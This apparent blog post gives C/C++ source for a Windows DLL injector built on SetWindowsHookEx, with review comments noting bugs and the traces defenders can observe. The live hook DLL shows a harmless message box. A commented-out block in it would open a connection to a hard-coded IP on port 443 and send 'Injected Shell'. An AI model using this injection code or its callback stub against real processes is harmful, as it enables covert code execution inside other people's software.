SetWindowHookEx()注入

/*

HHOOK
WINAPI
SetWindowsHookExW(
__in int idHook, //HookType
__in HOOKPROC lpfn, //HookProcedure 钩子程序
__in_opt HINSTANCE hmod, //
__in DWORD dwThreadId); //挂钩线程的ID

*/
#include <windows.h>
#include <stdio.h>
#include <tchar.h>
#include <TlHelp32.h>
#include <Psapi.h>
#pragma comment(lib,"psapi.lib")

/*
 * Injector side. This listing is two translation units pasted together: the
 * console injector (everything up to and including
 * ProcessInjectBySetWindowHookEx) and, after the second group of #includes,
 * the hook DLL (inject / DllMain). The DLL part uses extern "C", so it must be
 * built as C++.
 *
 * Mechanism, as the code below shows: SetWindowsHookEx is handed a thread id
 * that belongs to another process plus the hmod of a DLL this process loaded
 * with LoadLibrary; per the SetWindowsHookEx contract the system maps that
 * DLL into the hooked thread's process when the hook procedure is needed.
 * Defender view: the observable artifacts are a cross-process WH_KEYBOARD
 * hook registered against a single thread id, the hook DLL showing up as a
 * newly loaded module in the target process, and the MessageBox the DLL
 * displays from inside that process.
 */

/* Performs the actual injection: picks a thread id of ProcessId, loads the
   DLL, resolves its "inject" export, then calls SetWindowsHookEx.
   Returns -1 when the thread, the DLL or the export cannot be found;
   returns 0 otherwise - including when SetWindowsHookEx itself fails
   (see the note inside the function). */
int ProcessInjectBySetWindowHookEx(int ProcessId);

/* Returns the id of the first thread found in the system thread snapshot
   whose owner process is ProcessId and that OpenThread accepts.
   Returns 0 when no such thread is found. */
DWORD GetThreadID(DWORD ProcessId);

/*
 * Entry point: reads a PID from stdin, runs the injection helper and prints
 * the result.
 * NOTE(review): the conforming signature is int main(int argc, char *argv[]);
 * argv is unused here, so it only affects conformance. The scanf return value
 * is not checked, so ProcessId is read uninitialized when the input is not a
 * number, and it is printed with %u although it is an int. There is no
 * return statement; main falls off the end (returns 0 in C99/C++).
 */
int main(int argc, char* argv)
{
    int ProcessId;
    puts("Inject into which PID?");
    scanf("%d",&ProcessId);
    printf("PID entered: %u ", ProcessId);
    int Result = ProcessInjectBySetWindowHookEx(ProcessId);
    if(Result == -1) {
        puts("Could not inject");
    } else {
        // Reached whenever the helper returned 0, which also covers the case
        // where SetWindowsHookEx failed (the helper only prints and returns 0).
        puts("Injected!");
    }
    getchar();
}

/* This method is used to get a thread id for a process. It loops through all
   of the threads in a TH32CS_SNAPTHREAD snapshot and compares their owner pid
   with the desired pid; the first match that OpenThread accepts is returned. */
DWORD GetThreadID(DWORD ProcessId)
{
    puts("Getting Thread ID");
    // Despite its name this is the system-wide thread snapshot handle, not a
    // process handle.
    HANDLE ProcessHandle= CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
    if(ProcessHandle != INVALID_HANDLE_VALUE) {
        THREADENTRY32 te;
        te.dwSize = sizeof(te);
        if( Thread32First(ProcessHandle, &te)) {
            do {
                // Only trust th32OwnerProcessID if the returned entry is large
                // enough to contain that field.
                if (te.dwSize >= FIELD_OFFSET(THREADENTRY32, th32OwnerProcessID) + sizeof(te.th32OwnerProcessID)) {
                    if(te.th32OwnerProcessID == ProcessId) {
                        // OpenThread serves only as an access probe: the handle
                        // is never used afterwards and never closed (leak).
                        HANDLE ThreadHandle = OpenThread(READ_CONTROL, FALSE, te.th32ThreadID);
                        if(!ThreadHandle) {
                            puts("Couldn't get thread handle");
                        } else {
                            //DWORD tpid = GetProcessIdOfThread(hThread);
                            //printf("Got one: %u ", tpid);
                            // First matching thread wins.
                            // NOTE(review): this early return bypasses the
                            // CloseHandle below, so the snapshot handle leaks
                            // on the success path.
                            return te.th32ThreadID;
                        }
                    }
                }
            } while( Thread32Next(ProcessHandle, &te));
        }
    }
    // NOTE(review): also executed when the snapshot could not be created
    // (ProcessHandle == INVALID_HANDLE_VALUE).
    CloseHandle(ProcessHandle);
    return (DWORD)0;
}

/* This method performs the actual injection. It gets an appropriate thread id,
   loads the dll, gets the address of the inject method, then calls
   SetWindowsHookEx. */
int ProcessInjectBySetWindowHookEx(int ProcessId)
{
    TCHAR ProcessName[MAX_PATH] = TEXT("<unknown>");
    // The process is opened only to resolve a display name for the log line
    // below; it is not needed for the hook itself.
    // NOTE(review): this handle is never closed.
    HANDLE ProcessHandle = OpenProcess( PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, ProcessId);
    if (ProcessHandle != NULL) {
        HMODULE ModuleHandle;
        DWORD NeedLength;
        // Asks for a single module handle and names it; failures leave
        // ProcessName at "<unknown>".
        if ( EnumProcessModules( ProcessHandle, &ModuleHandle, sizeof(ModuleHandle), &NeedLength) ) {
            GetModuleBaseName( ProcessHandle, ModuleHandle, ProcessName, sizeof(ProcessName)/sizeof(TCHAR) );
        }
    }
    _tprintf( TEXT("Injecting into process %s PID: %u "), ProcessName, ProcessId);
    DWORD ThreadID = GetThreadID(ProcessId);
    printf( "Using Thread ID %u ", ThreadID);
    if(ThreadID == (DWORD)0) {
        puts("Cannot find thread");
        return -1;
    }
    // The DLL is loaded into THIS process first; its module handle is the
    // hmod argument SetWindowsHookEx needs.
    // NOTE(review): a narrow string literal is passed to the TCHAR-generic
    // LoadLibrary macro, so this only compiles in a non-UNICODE build. The
    // module is never released with FreeLibrary.
    HMODULE DllModuleHandle = LoadLibrary("InjectDll.dll");
    if(DllModuleHandle == NULL) {
        puts("Cannot find DLL");
        return -1;
    }
    HOOKPROC FuncAddress = (HOOKPROC)GetProcAddress(DllModuleHandle, "inject");
    if(FuncAddress == NULL) {
        puts("Cannot find the function");
        return -1;
    }
    //Uses the threadID from getThreadID to inject into specific process
    HHOOK HookHandle = SetWindowsHookEx(WH_KEYBOARD, FuncAddress, DllModuleHandle, ThreadID); // WH_KEYBOARD: keyboard key up/down events
    if(HookHandle == NULL) {
        // NOTE(review): the failure is only printed; the function still
        // returns 0 (so main() reports "Injected!") and UnhookWindowsHookEx
        // below is called with a NULL hook handle.
        puts("Couldn't hook the keyboard");
    }
    // The hook stays installed until three characters have been read from
    // stdin; the hook procedure can only run while it is installed.
    getchar();
    getchar();
    getchar();
    UnhookWindowsHookEx(HookHandle);
    return 0;
}

/*
 * Hook DLL side (separate translation unit; C++ because of extern "C").
 */
#include <stdio.h>
#include <winsock2.h>
#include <windows.h>

/*
 * Hook procedure, exported under the name "inject" that the injector resolves
 * with GetProcAddress. It runs inside the hooked process, shows a message box
 * and then hands the event to the next hook in the chain.
 * NOTE(review): the documented HOOKPROC type is LRESULT CALLBACK (int, WPARAM,
 * LPARAM); this declaration uses int and the default calling convention -
 * verify it matches the target build's ABI. The MessageBox call also passes
 * narrow literals to the TCHAR-generic macro (non-UNICODE build only).
 * The commented-out block below is an unfinished outbound TCP connection to a
 * hard-coded address on port 443. It is dead code here, but the literal
 * address and the "Injected Shell" string are the kind of values a defender
 * would treat as indicators if this sample were found in the wild.
 */
extern "C" __declspec(dllexport) int inject(int code, WPARAM wParam, LPARAM lParam)
{
    MessageBox(NULL,"haha","haha",MB_OK);
    //WSADATA wsa;
    //SOCKET s;
    //struct sockaddr_in server;
    //char *message;
    //printf(" Initializing Winsock...");
    //if(WSAStartup(MAKEWORD(2,2),&wsa) != 0)
    //{
    // printf("Failed. Error Code : %d", WSAGetLastError());
    // return(CallNextHookEx(NULL, code, wParam, lParam));
    //}
    //printf("Initialized. ");
    //if((s = socket(AF_INET, SOCK_STREAM, 0 )) == INVALID_SOCKET)
    //{
    // printf("Could not create socket : %d", WSAGetLastError());
    //}
    //printf("Socket Created. ");
    //server.sin_addr.s_addr = inet_addr("192.168.146.130"); //ip address
    //server.sin_family = AF_INET;
    //server.sin_port = htons( 443 );
    //if(connect(s, (struct sockaddr *)&server, sizeof(server)) < 0)
    //{
    // puts("connect error");
    // return(CallNextHookEx(NULL, code, wParam, lParam));
    //}
    //puts("Connected");
    //message = "Injected Shell";
    //if( send(s, message, strlen(message), 0) <0)
    //{
    // puts("Send failed");
    // return(CallNextHookEx(NULL, code, wParam, lParam));
    //}
    //puts("Data sent ");
    // Always pass the event on so the hooked application still receives it.
    return(CallNextHookEx(NULL, code, wParam, lParam));
}

/*
 * DLL entry point. Every attach/detach reason is a no-op; returning TRUE lets
 * the load proceed.
 */
INT APIENTRY DllMain(HMODULE hDll, DWORD Reason, LPVOID Reserved)
{
    switch(Reason) {
    case DLL_PROCESS_ATTACH:
        break;
    case DLL_PROCESS_DETACH:
        break;
    case DLL_THREAD_ATTACH:
        break;
    case DLL_THREAD_DETACH:
        break;
    }
    return TRUE;
}
原文地址:https://www.cnblogs.com/yifi/p/6527731.html